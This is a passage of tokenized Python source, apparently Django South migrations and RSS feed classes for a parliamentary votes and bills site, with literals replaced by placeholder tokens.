} , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:1>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from django . utils . translation import ugettext as _ <EOL> from django . contrib . syndication . views import Feed <EOL> from django . shortcuts import get_object_or_404 <EOL> from django . core . urlresolvers import reverse <EOL> from models import Vote , Bill <EOL> class Votes ( Feed ) : <EOL> title = _ ( "<STR_LIT>" ) <EOL> author_name = _ ( "<STR_LIT>" ) <EOL> description = "<STR_LIT>" <EOL> def items ( self ) : <EOL> return Vote . objects . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:20> ] <EOL> def item_title ( self , item ) : <EOL> return item . title <EOL> def item_description ( self , item ) : <EOL> return item . summary <EOL> class Bills ( Feed ) : <EOL> title = _ ( "<STR_LIT>" ) <EOL> description = _ ( "<STR_LIT>" ) <EOL> def author_name ( self ) : <EOL> return _ ( "<STR_LIT>" ) <EOL> def link ( self ) : <EOL> return reverse ( '<STR_LIT>' ) <EOL> def get_object ( self , request ) : <EOL> '''<STR_LIT>''' <EOL> stages = request . GET . get ( '<STR_LIT>' , False ) <EOL> self . stages = stages . split ( '<STR_LIT:U+002C>' ) if stages else False <EOL> return None <EOL> def items ( self ) : <EOL> bills = Bill . objects . order_by ( '<STR_LIT>' ) <EOL> if self . stages : <EOL> bills = bills . filter ( stage__in = self . stages ) <EOL> return bills [ : <NUM_LIT:20> ] </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , primary_key = True , auto_created = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ '<STR_LIT>' ] , null = False ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ '<STR_LIT>' ] , null = False ) ) <EOL> ) ) <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : 